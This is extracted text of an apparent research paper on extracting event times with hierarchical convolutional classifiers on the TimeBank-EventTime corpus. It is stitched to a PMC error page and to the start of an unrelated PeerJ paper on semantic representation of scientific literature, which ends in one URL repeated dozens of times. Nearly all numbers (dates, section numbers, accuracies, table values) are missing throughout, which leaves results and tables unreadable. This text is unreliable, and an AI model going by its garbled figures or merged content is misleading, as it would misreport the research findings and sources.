depicted in figure . the narrow down classifier is a sim- ple, hand-crafted, rule-based classifier described in section . . . . . neural network architecture we use the same neural network architecture with slightly different configurations for the different local classifiers. the architecture is depicted in figure and is described in the following sections. the neural network architecture is based on the design proposed by zeng et al. ( ), which can achieve state-of-the-art performance on relation clas- sification tasks (zeng et al., ; dos santos et al., ). the neural network applies a convolution over the word representations and position embeddings of the input text followed by a max-over-time pooling layer. we call the output of this layer input text fea- tures. those input text features are merged with the word embedding for the event and time expression token. the merged input is fed into a hidden layer using either the hyperbolic tangent tanh(·) or a rec- tified linear unit (relu) as activation function. the choice of the activation function is a hyperparameter and was optimized on a development set. the final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer. to avoid overfitting, we used two dropout layers (srivastava et al., ), the first before the dense hidden layer and the second after the dense hidden layer. the percent- ages of the dropouts were set as hyperparameters. word embeddings. we used the pre-trained word embeddings presented by levy and goldberg ( ). the embedding layer of our neural networks maps each token from the input text to their respec- tive word embedding. out-of-vocabulary tokens are figure : tree structure used to extract the temporal information for an event. rectangles are local classifiers based on deep convolutional neural networks except for the narrow down rectangles, which are simple rule based classifiers. figure : the neural network architecture used for the different local classifiers. replaced with a special unknown token, for which the word embedding was randomly initialized. position embeddings. collobert et al. ( ) pro- poses the use of position embeddings to keep track how close words in the input text are to certain tar- get words. for each input text, we specify certain words as targets. for example, we specify the event and the temporal expression as target words and train the network to learn the temporal relation between those. each word in the input text is then augmented with the relative distances. let pos , pos , ... be the positions of the target words in the input text. then, a word at position j is augmented with the features j −pos , j −pos , · · · . these augmented position features are then mapped in the embedding layer to a randomly initialized vector. the dimension of this vector is a hyperparameter of the network. the word embeddings and the position embed- dings are concatenated to form the input for the con- volutional layer. in the case of two target words, the input for the convolutional layer would be: emboutput = {[wew ,pe −pos ,pe −pos ], [wew , pe −pos ,p −pos ], ..., [wewn,pen−pos ,pen−pos ]} with wewj the embedding of the j-th word in the input text, pej−posk the embedding for the distance between the j-th word and the target word k. convolutional & max-over-time layer. a challenge for the classifier is the variable length of the input text and that important information can be anywhere in the input text. to tackle this issue, we use a convolutional layer to compute a distributed vector representation of the input text. let us define a vector xk as the concatenation of the word and po- sition embeddings for the position k as well as for m positions to the left and to the right: xk = ([we wk−m,pek−m−pos ,pek−m−pos ]||...|| [wewk,pek−pos ,pek−pos ]||...|| [wewk+m,pek+m−pos ,pek+m−pos ]) the convolutional layer multiplies all xk by a weight matrix w and applies the activation func- tion component-wise. after that, a max-over-time is applied, i.e., the max-function is applied component- wise. the j-th entry of the convolutional and max- over-time layer output is defined as: [convoutput]j = max ≤k≤n [tanh(w xk)]j lexical features. previous approaches heavily rely on lexical features. for example, the caevo system (chambers et al., ) uses, for the classifi- cation of event-time edges, the token, the lemma, the pos tag, the tense , the grammatical aspect and the class of event as well as the parse tree between event and time expression. in our evaluation, we did not observe that these features have a significant impact on the performance. hence, we decided to use the event and time tokens as the only features besides the dense vector representation of the input text. for multi-token expressions, we only use the first token. our architecture focuses on extracting the event time when event annotations and temporal expressions are provided. in order to evaluate the accuracy of this isolated step, we decided to use the provided annotations in the corpus. the baselines we defined tenses: simple, perfect, and progressive defined aspects in timebank: past, present, future defined classes in timebank: occurrence, perception, re- porting, aspectual, state, i state, i action compared against use these gold annotations as well. output. the distributed vector representation of the input text and the embeddings of event/time token are concatenated and passed through a dense layer. as the activation function, we allowed either the hy- perbolic tangent or the rectified linear unit (relu). the choice is a parameter of the network. the final layer is either a single sigmoid neuron, in the case of binary classification, or a softmax layer to compute the probabilities of the different tags. . . single vs. multi-day event classification the first local classifier, that decides whether an event is a single day event or a multi-day event, uses the event word as the target word. . . dct classification a single day event can happen either before the document was created (before-class), on the same day (simultaneous-class), or it will hap- pen at least one day after the document was created (after-class). the configuration of this local clas- sifier is as in the previous section. note, to classify the relation to the dct, in most cases, it was not important to know the concrete document creation time. therefore, we did not pass the dct as a value to the network. for multi-day events, we decided to group the events into three categories: first, events that be- gan and ended before the document creation time (before-class); second, events that began before dct and ended after dct (includes-class); and third, events that will begin and end after dct (after-class). . . detecting relevant time expressions in the case the event did not happen at the dct, it is important to take the surrounding text and po- tentially the whole document into account to figure out at which date the event happened. for our classi- fier, we assume that temporal expressions are already detected in the document. to detect temporal ex- pressions, tools like heideltime can be used that achieve an f -score of . on extracting temporal expressions in the timebank corpus (strötgen and gertz, ). https://github.com/heideltime as an intermediate step to detect when an event happened, we first decide whether the temporal ex- pression is relevant for the event or not. we define a temporal expression to be relevant, if the (normal- ized) value of the temporal expression is part of the event time annotation. the value of the temporal ex- pression can either be the event time, or it can appear in the before or after notation. the classifier is executed for all event and temporal expression pairs. the input text for the distributed text representation is the text between the event and the temporal expression. . . temporal relation classification given the relevant temporal expression for an event from the previous step, the next local classi- fier establishes the temporal relation between the event and the temporal expression. for a given, relevant event-temporal expression pair, it outputs before - when the event happened before the tem- poral expression, after - when it happened after, or simultaneous - when it happened on the men- tioned date. this local classifier has the same configu- ration as the network used to detect relevant temporal expression. . . narrow down classifier the goal of the narrow down classifier, that is used in step . , . . and . . in figure , is to derive the final label given the information on the rel- evant temporal expressions, their relation to the event, and the relation to the document creation time. for most events in the corpus, this information was un- ambiguous, e.g., only one temporal expression was classified as relevant for the event. the proposed approach returns multiple relevant temporal expres- sions only for a small fraction of events. however, this number was too small to train and to validate a learning algorithm for this stage. hence, we decided to implement a straightforward, rule-based classifier. this classifier is depicted in algorithm . it takes all relations to relevant temporal expres- sions as well as the relation to the document cre- ation time to derive the final output. in the case a simultaneous relation exists, the classifier stops and the appropriate temporal expression is used as event time. if no such relation exists, a frequency distribution of the linked dates and relations is cre- ated for before as well as for after relations. for example, when the system extracts three relevant before relations of different mentions of date throughout the text and two relevant before rela- tions of different mentions of date , then the sys- tem would choose date as a slot-filler for the be- fore property. if there are as many relevant before relations for date as for date , the system will choose the lowest date for the before property (line - ). for after relations, we use the same logic, except that we choose the largest date (line ). algorithm narrow down classifier : function narrowdown(times) : fd before, fd after = freqdistribution() : for [relation, time] in times do : if relation is simultaneous then : return time : else if relation is before then : fd before.new sample(time) : else if relation is after then : fd after.new sample(time) : end if : end for : //fd before elements have the fields .num=#samples and .time=time value : if fd before.size > then : // find the largest number of samples of a time : max samples = fd before.max( .num) : //take minimum over all times having max samples : before time = fd before.filter( .num == max samples).min( .time) : end if : if fd after.size > then : // find the largest number of samples of a time : max samples = fd after.max( .num) : //take maximum over all times having max samples : after time = fd after.filter( .num == max samples).max( .time) : end if : return after + after time + before + before time : end function . baseline we use two baselines to compare our system. as the first baseline, we use the system presented in reimers et al. ( ). the baseline is based on the multi-pass architecture caevo introduced by cham- bers et al. ( ) and extracts all tlinks between event mentions and temporal expressions. the sys- tem by chambers et al. applies multiple rules and trained classifiers to extract those tlinks. the dif- ferent stages are ranked by precision and are executed consecutively. a shortcoming of the system is that it does not produce temporal information if an event lasted for more than a day. hence, the system cannot be used to distinguish between single day and multi- day events, nor can it extract the begin/end points for multi-day events. our previously presented baseline uses the ex- tracted relations for single day events and gener- ates a set of <relation, time> tuples in which the event is involved. we use the narrow down classifier from section . . to extract the final label. when all extracted relations are of type vague, the baseline returns that it cannot infer the time for the event. the second baseline is a reduced version of the hierarchical tree. for this baseline, we first apply the classifier to decide whether it is a single day or multi-day event. when it is a single day event, we classify the relation to the document creation time (dct) (classifier . ). when the event did not happen at dct, we link it to the closest temporal expression in the document. for multi-day events, we only run the classifier . to extract the relation to dct. when the event happened before dct, we set the begin and end point to before dct; when it happened after dct, we set both to after dct; and, when the relation was includes, we set the begin point to before dct and the end point to after dct. experimental setup we conduct our experiments on the timebank- eventtime corpus (reimers et al., ). the corpus is comprised of documents and annotated events. we use the same split into training, develop- ment, and test set as chambers et al. ( ) resulting in documents for training, documents for hyper- parameter optimization, and documents for the final evaluation. using this split allows a fair comparison to the caevo system. hyperparameters for the individual local classi- fiers were chosen using random search (bergstra and bengio, ) with at least iterations per local classifier. experimental results we evaluate our system using two different metrics. the strict metric requires an exact match between the predicted label and the gold label. a disadvantage of this metric is that it does not allow partial agree- ment. the strict agreement between two annotators is fairly low for events where the exact date of the event was not mentioned. in order to allow partial matches, we will also use a relaxed metric, which will judge two different la- bels only as an error, if those are mutually exclusive. two labels are mutually exclusive, if there is no event date which could satisfy both labels at the same time. if the event happened on august th, , the two annotations before - - and after - - before - - would both be satisfied. there- fore, these two different labels would be considered as correct. in contrast, the two annotations after - - and before - - can never be satisfied at the same time and are therefore mutually exclusive. the score of the relaxed metric must be seen in combination with the strict metric. a system could trick the relaxed metric by returning a before date that is far in the future which results in a high relaxed score but a negligible strict score. future research is necessary to judge the quality of different kind of partial matches and to design an appropriate metric. . system performance following the recommendations in (reimers and gurevych, ), we train the system with dif- ferent random seed values, and compute the mean performance score and the standard deviation. table shows the results in comparison to the observed inter-annotator agreement (iaa). the inter-annotator agreement is based on two full annotations of the cor- pus. the chance-corrected agreement is α = . using krippendorff’s α (krippendorff, ). the two annotations were merged into a final gold label annotation of the corpus, which we used for training and evaluation. the accuracy to distinguish between single day and multi-day events is . % on the test set, in comparison to an inter-annotator agreement of . %. the overall performance is . %, compared to an iaa of . % using the strict metric. for multi-day events, we observe an accuracy with the strict metric of . %, compared to an iaa of . %. breaking it down to the begin- and end- point extraction, we observe a much lower accuracy for the begin point extraction of just . %, com- system iaa single vs. multi-day . % ± . . % single day (strict) . % ± . . % single day (relaxed) . % ± . . % multi-day (strict) . % ± . . % begin (strict) . % ± . . % end (strict) . % ± . . % multi-day (relaxed) . % ± . . % begin (relaxed) . % ± . . % end (relaxed) . % ± . . % overall acc. (strict) . % ± . . % overall acc. (relaxed) . % ± . . % table : accuracy for the different stages of our system in comparison to the observed inter-annotator agreement (iaa). the strict metric requires an exact match between the labels. the relaxed metric requires that the two anno- tations are not mutually exclusive. pared to . % accuracy for the end point extraction. however, using the relaxed metric, we see an accu- racy of . % for the begin point and . % for the end point. we can conclude that the extraction of the begin point works well, however, in a large set of cases ( . %) the extracted begin point is less precise than the gold annotation. the baseline based on the caevo system from chambers et al. ( ) can only be applied to single day events, as tlink types that define the start or the end of an event do not exist. we ran this baseline on all events that were correctly identified as single day events. the performance of this baseline is depicted in table . for the proposed approach we observe a performance increase from . % to . %. for . % of the events, the retrieved label of the proposed approach was less precise than the gold label. an example of a less precise label would be before - - while the gold label was before - - . a clear wrong label was observed for . % of the generated labels. a big disadvantage of a dense tlink annotation is the restriction of tlinks for events and temporal expression that are in the same, or in adjacent, sen- tences. for . % of the events, the baseline was not able to infer any event time information. as our sys- tem outputs a label for every event, we see a slightly increased number of wrong labels in comparison to the baseline. single day events ours caevo exact match . % . % less precise . % . % wrong label . % . % cannot infer time - . % table : distribution of the retrieved labels for the pro- posed system and for the baseline. less precise are labels where the time frame when the event has happened is larger than for the gold label. wrong label are labels which are in clear contradiction to the gold standard. table compares the proposed system against the reduced tree that only classifies the type of the event (single day or multi-day) and the relation to the doc- ument creation time. we observe a significant drop in accuracy for single day events, indicating that just classifying the relation to the document creation time is insufficient for this task. system sd md overall full system . % . % . % reduced tree . % . % . % caevo . % - . % table : comparison of the accuracy (strict metric) for single day events (sd), multi-day events (md) and overall. reduced tree uses only the local classifiers , . and . . . error analysis error propagation is an important factor in a decision tree. table depicts the accuracy of the different local classifiers. we compare those to a majority vote baseline. for all local classifiers we can see a large performance increase over the baseline. we observe the lowest accuracy for the classifiers of the begin point ( . . . and . . .). this is in line with the previous observation of the low accuracy for begin point labels as well as with the low iaa for begin point annotations. the root classifier, which decides whether the event is a single day or a multi-day event, is the most critical classifier. this classifier is responsible for . % of the erroneously labeled events. how- ever, with an accuracy of . % it is already fairly close to the iaa of . % and it is unclear if this classifier could substantially be improved. system majority vote . event type . % . % single day event . . dct rel. . % . % . . relevant . % . % . . relation . % . % multi-day event . . begin point . . . relevant . % . % . . . relation . % . % . . dct rel. . % . % . . end point . . . relevant . % . % . . . relation . % . % table : accuracy for the different local classifiers vs. a majority vote baseline. local classifiers are numbered as depicted in figure . as mentioned in the introduction, the annotators were not restricted to the dates that are explicitly mentioned in the document but could also create new dates. for example, in the sentence it’s the [second day]date: - - of an [offensive]beginpoint= - - ... it is clear for the annotator that the offensive started on - - . however, this date is not explicitly mentioned in the text, only the date - - is mentioned. we call such dates out-of-document dates. handling those cases is extremely difficult and our system is currently not capable of creating such out- of-document dates. table depicts the error rate introduced by those dates. as the table depicts, . % of the event time labels are affected by out-of-document dates. an especially high percentage of such dates is observed for the be- gin point of multi-day events. in a lot of these cases the document states either an explicit or a rough esti- mation on the duration of the event. in the previous example, the text stated that the offensive already lasted for two days. in another example, the docu- ment gives the information that the event started in recent years or that it lasted for roughly / years. . ablation test table presents the changes in accuracy in per- centage points when individual components of the proposed system are changed. we observe a slight out-of-document dates single day events . % multi-day events . % begin point . % end point . % overall . % table : percentage of labels in the test set affected by out-of-document dates. drop of - . percentage points if bidirectional lstm- networks with recurrent units are used instead of convolutional neural networks. lstm-networks showed for other nlp tasks state-of-the-art perfor- mance, however, for this task they were not able to improve the performance. one reason could be the comparably small training set of documents. a further disadvantage of the bilstm-networks was the significantly longer training time, prohibiting run- ning an extensive hyperparameter tuning. configuration accuracy full system . % bilstm instead of cnn - . rnd. word embeddings - . no input text feature - . no position feature - . no narrow down - . table : change in accuracy (strict metric) in percent- age points when replacing individual components of the architecture. an important factor for the performance was the pre-trained word embeddings. replacing those with randomly initialized embeddings decreased the per- formance by - . percentage points. as before, we think this is due to the small training size. a large number of test tokens do not appear in the training set and several tokens only appear infrequently in the training set. hence, the network is not able to learn meaningful representations for those words. our system successfully uses the text between the event and the temporal expression (input text fea- tures) for classifying the relation between those. re- moving this part of the architecture decreases the ac- curacy by - . percentage points. further, it appears that not only the token itself, but also the position of the token relative to the event / time token is taken into account. removing this position information from the input text feature reduces the performance by - . percentage points. replacing the narrow down classifier with a classi- fier that randomly selects one of the relevant temporal expressions reduces the performance by only - . per- centage points. for most events, there was only one relevant temporal expression extracted. we analyzed the parameter settings for the top five performing lo- cal classifiers for each stage. the activation function (tanh and relu) appears to have a negligible impact on the performance. . event timeline construction we evaluated our system on the shared task semeval- task : timeline: cross-document event or- dering (minard et al., ). the goal is to construct an event timeline for a target entity given a set of documents from wikinews on certain topics. we use the setting of track b, where the events are provided. we used heideltime to detect and normalize time expressions. we then ran our system out of the box, i.e., without retraining for the new dataset. for the shared task, an event can occur either at a specific day, in a specific month, or in a specific year. events that can not be anchored in time are removed from the evaluation. we implemented simple rules that transform our system output to the format of the shared task: if an event is simultaneous with a specific time expression, we will output this date. if our system returns that it happened before and after a certain date, it will output the year and month if both dates are in the same month. if both dates are in the same year but in different months, it will output the year. events with predicted timespans of over more than one year are rejected. for multi-day events, we only use the begin point as only this information was annotated for this shared task. two teams participated in the shared task (gpl- siua and heideltoul). currently, the best published performance was achieved by cornegruta and vla- chos ( ) with an f -score of . . our system was able to improve the total f -score by . points as depicted in table . a challenge for our system is the different anchor- ing of events in time: while our system can anchor events at two arbitrary dates, the semeval- task only anchors events either at a specific day, month system airbus gm stock total our approach . . . . cornegruta . . . . gplsiua . . . . heideltoul . . . . table : performance of our system on the semeval- task track b for the topics airbus, general motors, and stock market. or year. when our system returns the event time value after - - and before - - , we had to decide how to anchor this event for the gen- erated timeline. for such an event, three final labels would be plausible: - -xx, - -xx, and -xx-xx. a similar challenge occurs for events that received a label like before - - . if we anchor it in - -xx, we must be certain that the event happened in november. similarly, if we an- chor it in -xx-xx, we must be certain that the event happened in . such information cannot be inferred directly from the returned label of our system. as only documents on a single topic were provided for training, we could not tune the transfor- mation accordingly. a manual analysis revealed that this transformation caused around % of the errors. conclusion event time extraction is a challenging classifica- tion task as the set of labels is infinite and the label depends on the information that is scattered across the document. the presented classifier is able to take the whole document into account and to infer the date when an event has happened. we applied the system to the timebank-eventtime corpus and achieved an accuracy of . % in comparison to an inter-annotator agreement of . % using a strict metric. for . % of the single day events, the exact event time could be extracted. this is a . percentage points improvement in comparison to the state-of-the-art approach by chambers et al. ( ). we demonstrated the generalizability by applying it to the semeval- task on timeline generation, where it improved the f -score by . percentage points compared to the state-of-the-art. acknowledgements this work has been supported by the german re- search foundation as part of the research training group adaptive preparation of information from het- erogeneous sources (aiphes) under grant no. grk / . we would like to thank the tacl editors and reviewers for their effort and the valuable feedback we received from them. references james allan. . topic detection and tracking: event- based information organization. pages – . kluwer academic publishers, norwell, ma, usa. james bergstra and yoshua bengio. . random search for hyper-parameter optimization. j. mach. learn. res., : – , february. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . inducing temporal graphs. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. taylor cassidy, bill mcdowell, nathanael chambers, and steven bethard. . an annotation framework for dense event ordering. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, usa. association for computa- tional linguistics. nathanael chambers and dan jurafsky. . jointly combining implicit constraints improves temporal or- dering. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. nathanael chambers, taylor cassidy, bill mcdowell, and steven bethard. . dense event ordering with a multi-pass architecture. transactions of the associa- tion for computational linguistics, : – . ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. . natural language processing (almost) from scratch. j. mach. learn. res., : – , november. savelie cornegruta and andreas vlachos. . time- line extraction using distant supervision and joint in- ference. in proceedings of the conference on empirical methods in natural language processing, emnlp , austin, texas, usa, november - , , pages – . quang xuan do, wei lu, and dan roth. . joint inference for event timeline construction. in pro- ceedings of the joint conference on empirical methods in natural language processing and compu- tational natural language learning, emnlp-conll ’ , pages – , stroudsburg, pa, usa. associa- tion for computational linguistics. cı́cero nogueira dos santos, bing xiang, and bowen zhou. . classifying relations by ranking with convolutional neural networks. in proceedings of the rd annual meeting of the association for computa- tional linguistics and the th international joint con- ference on natural language processing of the asian federation of natural language processing, acl , july - , , beijing, china, volume : long pa- pers, pages – . lisa ferro. . tides. instruction manual for the annotation of temporal expressions. technical report, mitre technical report. oleksandr kolomiyets, steven bethard, and marie- francine moens. . extracting narrative timelines as temporal dependency structures. in proceedings of the th annual meeting of the association for com- putational linguistics: long papers - volume , acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. klaus krippendorff. . content analysis: an in- troduction to its methodology (second edition). sage publications. yann lecun, . generalization and network design strategies. elsevier. omer levy and yoav goldberg. . dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics, acl , june - , , baltimore, md, usa, volume : short papers, pages – . anne-lyse minard, manuela speranza, eneko agirre, itziar aldabe, marieke van erp, bernardo magnini, german rigau, and ruben urizar. . semeval- task : timeline: cross-document event order- ing. in proceedings of the th international workshop on semantic evaluation, semeval@naacl-hlt , denver, colorado, usa, june - , , pages – . james pustejovsky, patrick hanks, roser sauri, andrew see, robert gaizauskas, andrea setzer, dragomir radev, beth sundheim, david day, lisa ferro, and marcia lazo. . the timebank corpus. in pro- ceedings of corpus linguistics , pages – , lancaster, uk. nils reimers and iryna gurevych. . reporting score distributions makes a difference: performance study of lstm-networks for sequence tagging. in proceed- ings of the conference on empirical methods in natural language processing (emnlp), pages – , copenhagen, denmark, september. nils reimers, nazanin dehghani, and iryna gurevych. . temporal anchoring of events for the time- bank corpus. in proceedings of the th annual meet- ing of the association for computational linguistics (acl ), volume : long papers, pages – . association for computational linguistics, august. roser saurı́, jessica littman, robert gaizauskas, andrea setzer, and james pustejovsky. . timeml anno- tation guidelines, version . . . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from over- fitting. j. mach. learn. res., ( ): – , jan- uary. jannik strötgen and michael gertz. . a baseline temporal tagger for all languages. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , lisbon, portugal, september. association for computational linguistics. mihai surdeanu. . overview of the tac knowledge base population evaluation: english slot filling and temporal slot filling. in proceedings of the tac-kbp workshop, gaithersburg, maryland, usa. naushad uzzaman and james f. allen. . trips and trios system for tempeval- : extracting tem- poral information from text. in proceedings of the th international workshop on semantic evaluation, semeval ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. naushad uzzaman, hector llorens, leon derczynski, marc verhagen, james f. allen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in proceedings of the th international workshop on se- mantic evaluation (semeval ), pages – , atlanta, gerogia, usa. marc verhagen, robert gaizauskas, frank schilder, mark hepple, graham katz, and james pustejovsky. . semeval- task : tempeval temporal rela- tion identification. in proceedings of the th inter- national workshop on semantic evaluations, semeval ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. marc verhagen, roser saurı́, tommaso caselli, and james pustejovsky. . semeval- task : tempeval- . in proceedings of the th international workshop on semantic evaluation, semeval ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. katsumasa yoshikawa, sebastian riedel, masayuki asa- hara, and yuji matsumoto. . jointly identifying temporal relations with markov logic. in proceed- ings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: vol- ume , acl ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. daojian zeng, kang liu, siwei lai, guangyou zhou, and jun zhao. . relation classification via convolu- tional deep neural network. in coling , th international conference on computational linguis- tics, proceedings of the conference: technical papers, august - , , pages – , dublin, ireland. wp-p m- .ebi.ac.uk params is empty sys_ exception wp-p m- .ebi.ac.uk no params is empty exception params is empty / / - : : if (typeof jquery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/ . . /js/jig.min.js"][/script]'.replace(/\[/g,string.fromcharcode( )).replace(/\]/g,string.fromcharcode( ))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} page not available reason: the web page address (url) that you used may be incorrect. message id: (wp-p m- .ebi.ac.uk) time: / / : : if you need further help, please send an email to pmc. include the information from the box above in your message. otherwise, click on one of the following links to continue using pmc: search the complete pmc archive. browse the contents of a specific journal in pmc. find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/med/ semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud submitted august accepted november published december corresponding authors bahar sateli, sateli@semanticsoftware.info rené witte, witte@semanticsoftware.info academic editor tamara sumner additional information and declarations can be found on page doi . /peerj-cs. copyright sateli and witte distributed under creative commons cc-by . open access semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud bahar sateli and rené witte semantic software lab, department of computer science and software engineering, concordia university, montréal, québec, canada abstract motivation. finding relevant scientific literature is one of the essential tasks re- searchers are facing on a daily basis. digital libraries and web information retrieval techniques provide rapid access to a vast amount of scientific literature. however, no further automated support is available that would enable fine-grained access to the knowledge ‘stored’ in these documents. the emerging domain of semantic publish- ing aims at making scientific knowledge accessible to both humans and machines, by adding semantic annotations to content, such as a publication’s contributions, methods, or application domains. however, despite the promises of better knowledge access, the manual annotation of existing research literature is prohibitively expen- sive for wide-spread adoption. we argue that a novel combination of three distinct methods can significantly advance this vision in a fully-automated way: (i) natural language processing (nlp) for rhetorical entity (re) detection; (ii) named entity (ne) recognition based on the linked open data (lod) cloud; and (iii) automatic knowledge base construction for both nes and res using semantic web ontologies that interconnect entities in documents with the machine-readable lod cloud. results. we present a complete workflow to transform scientific literature into a semantic knowledge base, based on the w c standards rdf and rdfs. a text min- ing pipeline, implemented based on the gate framework, automatically extracts rhetorical entities of type claims and contributions from full-text scientific literature. these res are further enriched with named entities, represented as uris to the linked open data cloud, by integrating the dbpedia spotlight tool into our workflow. text mining results are stored in a knowledge base through a flexible export process that provides for a dynamic mapping of semantic annotations to lod vocabularies through rules stored in the knowledge base. we created a gold standard corpus from computer science conference proceedings and journal articles, where claim and contribution sentences are manually annotated with their respective types using lod uris. the performance of the re detection phase is evaluated against this corpus, where it achieves an average f-measure of . . we further demonstrate a number of semantic queries that show how the generated knowledge base can provide support for numerous use cases in managing scientific literature. availability. all software presented in this paper is available under open source licenses at http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements. development releases of individual components are additionally available on our github page at https://github.com/semanticsoftwarelab. how to cite this article sateli and witte ( ), semantic representation of scientific literature: bringing claims, contributions and named entities onto the linked open data cloud. peerj comput. sci. :e ; doi . /peerj-cs. mailto:sateli@semanticsoftware.info mailto:witte@semanticsoftware.info https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements http://www.semanticsoftware.info/semantic-scientific-literature-peerj- -supplements 